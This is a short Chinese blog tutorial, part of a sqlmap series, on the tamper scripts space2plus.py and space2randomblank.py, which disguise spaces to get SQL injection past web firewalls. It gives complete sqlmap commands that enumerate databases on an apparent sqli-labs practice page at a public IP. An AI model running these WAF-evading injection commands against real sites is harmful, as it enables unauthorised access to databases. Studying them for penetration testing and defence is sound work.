sqlmap从入门到精通-第七章-7-22 绕过WAF脚本-space2plus.py&space2randomblank.py

46. space2plus.py脚本

通过使用"+"来替换空格 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2plus.py" --proxy="http://127.0.0.1:8080" -batch

没有注入成功,我们看看burp抓包情况

确认效果是没问题的,使用+衔接

==================================================================================================================================================

47. space2randomblank.py脚本

使用类似%09,%0A,%0C,%0D随机字符串替换payload中的空格

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2randomblank.py" --proxy="http://127.0.0.1:8080" -batch

确认是可以成功注入,那么我们看看burp的抓包情况

确实添加了%0A %0C等随机字符串进行注入

 

posted @ 2020-09-05 12:43  皇帽讲绿帽带法技巧  阅读(330)  评论(0编辑  收藏  举报